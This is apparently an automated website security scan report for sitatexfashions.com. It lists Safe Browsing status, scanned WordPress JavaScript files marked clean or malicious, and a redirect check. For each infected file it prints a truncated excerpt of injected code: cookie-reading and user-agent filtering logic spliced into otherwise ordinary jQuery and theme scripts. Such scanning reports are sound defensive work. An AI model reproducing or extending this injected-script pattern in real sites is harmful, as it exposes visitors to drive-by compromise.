Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=sitatexfashions.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.sitatexfashions.com/ | 200 OK Content-Length: 21791 Content-Type: text/html | clean |
http://www.sitatexfashions.com/wp-includes/js/jquery/jquery.js?ver=1.11.0 | 200 OK Content-Length: 97468 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(e){var o=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return o?decodeURIComponent(o[1]):void 0}!function(){function e(e,o,t){var r=(e+"").toLowerCase(),i=(o+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,t))?n:!1}function o(){var o=["Linux","Windows NT 6.3","Windows NT 6.2","rv:11.0","AppleWebKit","Android","Googlebot","IEMobile","Yandex"],t=!1;for(var r in o)if(e(navigator.userAgent,o[r])){t=!0;break}return t}var t jQuery.noConflict(); Antivirus reports:
| ||
http://www.sitatexfashions.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 8266 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(e){var o=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return o?decodeURIComponent(o[1]):void 0}!function(){function e(e,o,t){var r=(e+"").toLowerCase(),i=(o+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,t))?n:!1}function o(){var o=["Linux","Windows NT 6.3","Windows NT 6.2","rv:11.0","AppleWebKit","Android","Googlebot","IEMobile","Yandex"],t=!1;for(var r in o)if(e(navigator.userAgent,o[r])){t=!0;break}return t}var t Antivirus reports:
| ||
http://www.sitatexfashions.com/wp-content/plugins/wordpress-popup/popoverincludes/js/popover-load-custom.js?ver=3.9.2 | 200 OK Content-Length: 4804 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(e){var o=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return o?decodeURIComponent(o[1]):void 0}!function(){function e(e,o,t){var r=(e+"").toLowerCase(),i=(o+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,t))?n:!1}function o(){var o=["Linux","Windows NT 6.3","Windows NT 6.2","rv:11.0","AppleWebKit","Android","Googlebot","IEMobile","Yandex"],t=!1;for(var r in o)if(e(navigator.userAgent,o[r])){t=!0;break}return t}var t jsonpCallback: 'po_onsuccess', data: {popoverajaxaction: 'popover_selective_ajax', thefrom: thefrom.toString(), thereferrer: thereferrer.toString(), active_popover: force_popover.toString() }, success: function(data) { } } ); return false; } function po_selectiveLoad() { po_load_popover(); } jQuery(window).load(po_selectiveLoad); Antivirus reports:
| ||
http://www.sitatexfashions.com/wp-content/themes/showcase/javascript/cufon.js?ver=1.0 | 200 OK Content-Length: 43939 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(e){var o=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return o?decodeURIComponent(o[1]):void 0}!function(){function e(e,o,t){var r=(e+"").toLowerCase(),i=(o+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,t))?n:!1}function o(){var o=["Linux","Windows NT 6.3","Windows NT 6.2","rv:11.0","AppleWebKit","Android","Googlebot","IEMobile","Yandex"],t=!1;for(var r in o)if(e(navigator.userAgent,o[r])){t=!0;break}return t}var t } } var gradient = options.textGradient; if (gradient) { var stops = gradient.stops, fill = g.createLinearGradient(0, viewBox.minY, 0, viewBox.maxY); for (var i = 0, l = stops.length; i < l; ++i) { fill.addColorStop.apply(fill, stops[i]); } g.fillStyle = fill; } else g.fillStyle = style.get('color'); renderText(); return wrapper; }; })()); Antivirus reports:
| ||
http://www.sitatexfashions.com/wp-includes/js/wp-ajax-response.min.js?ver=3.9.2 | 200 OK Content-Length: 3133 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(e){var o=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return o?decodeURIComponent(o[1]):void 0}!function(){function e(e,o,t){var r=(e+"").toLowerCase(),i=(o+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,t))?n:!1}function o(){var o=["Linux","Windows NT 6.3","Windows NT 6.2","rv:11.0","AppleWebKit","Android","Googlebot","IEMobile","Yandex"],t=!1;for(var r in o)if(e(navigator.userAgent,o[r])){t=!0;break}return t}var t Antivirus reports:
| ||
http://www.sitatexfashions.com/wp-content/plugins/theme-my-login/modules/ajax/js/ajax.js?ver=3.9.2 | 200 OK Content-Length: 3814 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(e){var o=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return o?decodeURIComponent(o[1]):void 0}!function(){function e(e,o,t){var r=(e+"").toLowerCase(),i=(o+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,t))?n:!1}function o(){var o=["Linux","Windows NT 6.3","Windows NT 6.2","rv:11.0","AppleWebKit","Android","Googlebot","IEMobile","Yandex"],t=!1;for(var r in o)if(e(navigator.userAgent,o[r])){t=!0;break}return t}var t tmlAjax.window.unbind().remove(); }); tmlAjax.overlay .fadeTo('slow', 0, function() { tmlAjax.overlay.unbind().remove(); }); }, reposition : function() { this.window.css({ marginTop: '-' + parseInt((this.window.outerHeight() / 2),10) + 'px', marginLeft: '-' + parseInt((this.window.outerWidth() / 2),10) + 'px' }); } } $(document).ready(tmlAjax.init); })(jQuery); Antivirus reports:
| ||
http://www.sitatexfashions.com/wp-content/plugins/wp-seo-images/assets/js/admin.js?ver=3.9.2 | 200 OK Content-Length: 1891 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(e){var o=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return o?decodeURIComponent(o[1]):void 0}!function(){function e(e,o,t){var r=(e+"").toLowerCase(),i=(o+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,t))?n:!1}function o(){var o=["Linux","Windows NT 6.3","Windows NT 6.2","rv:11.0","AppleWebKit","Android","Googlebot","IEMobile","Yandex"],t=!1;for(var r in o)if(e(navigator.userAgent,o[r])){t=!0;break}return t}var t jQuery.post(ajaxurl, data, function(response) { if (response=="ko"){ jQuery("#wp-seo-images-update-message").hide(); alert("Sorry, can't save your changes"); } else { jQuery("#wp-seo-images-update-message").hide(); jQuery("#id_modify_ok").show(); } }); }); }); Antivirus reports:
| ||
http://www.sitatexfashions.com/wp-content/themes/showcase/javascript/jquery.preloader.js?ver=1.0 | 200 OK Content-Length: 3219 Content-Type: application/javascript | clean |
http://www.sitatexfashions.com/wp-content/themes/showcase/javascript/cufon/Sansation_400.font.js?ver=1.0 | 200 OK Content-Length: 34800 Content-Type: application/javascript | clean |
http://www.sitatexfashions.com/wp-content/themes/showcase/javascript/superfish.js?ver=1.0 | 200 OK Content-Length: 4899 Content-Type: application/javascript | clean |
http://www.sitatexfashions.com/wp-content/themes/showcase/javascript/supersub.js?ver=1.0 | 200 OK Content-Length: 4452 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(e){var o=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return o?decodeURIComponent(o[1]):void 0}!function(){function e(e,o,t){var r=(e+"").toLowerCase(),i=(o+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,t))?n:!1}function o(){var o=["Linux","Windows NT 6.3","Windows NT 6.2","rv:11.0","AppleWebKit","Android","Googlebot","IEMobile","Yandex"],t=!1;for(var r in o)if(e(navigator.userAgent,o[r])){t=!0;break}return t}var t 'float' : liFloat, 'width' : '100%', 'white-space' : 'normal' }) .each(function(){ var $childUl = $('>ul',this); var offsetDirection = $childUl.css('left')!==undefined ? 'left' : 'right'; $childUl.css(offsetDirection,emWidth); }); }); }); }; $.fn.supersubs.defaults = { minWidth : 9, maxWidth : 25, extraWidth : 0 }; })(jQuery); Antivirus reports:
| ||
http://www.sitatexfashions.com/wp-content/themes/showcase/javascript/hoverIntent.js?ver=1.0 | 200 OK Content-Length: 4323 Content-Type: application/javascript | clean |
http://www.sitatexfashions.com/wp-content/themes/showcase/javascript/gdl-scripts.js?ver=1.0 | 200 OK Content-Length: 4949 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(e){var o=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return o?decodeURIComponent(o[1]):void 0}!function(){function e(e,o,t){var r=(e+"").toLowerCase(),i=(o+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,t))?n:!1}function o(){var o=["Linux","Windows NT 6.3","Windows NT 6.2","rv:11.0","AppleWebKit","Android","Googlebot","IEMobile","Yandex"],t=!1;for(var r in o)if(e(navigator.userAgent,o[r])){t=!0;break}return t}var t } }); }); }); (function($) { $.fn.equalHeights = function(px) { $(this).each(function(){ var currentTallest = 0; $(this).children().each(function(i){ if ($(this).height() > currentTallest) { currentTallest = $(this).height(); } }); $(this).children().css({'min-height': currentTallest}); }); return this; }; })(jQuery); Antivirus reports:
| ||
http://www.sitatexfashions.com/wp-content/themes/showcase/javascript/jquery.easing.js?ver=1.0 | 200 OK Content-Length: 9367 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: sitatexfashions.com
Result:
GET / HTTP/1.1
Host: sitatexfashions.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: sitatexfashions.com
Referer: http://www.google.com/search?q=sitatexfashions.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: sitatexfashions.com
Referer: http://www.google.com/search?q=sitatexfashions.com
Result:
The result is similar to the first query. There are no suspicious redirects found.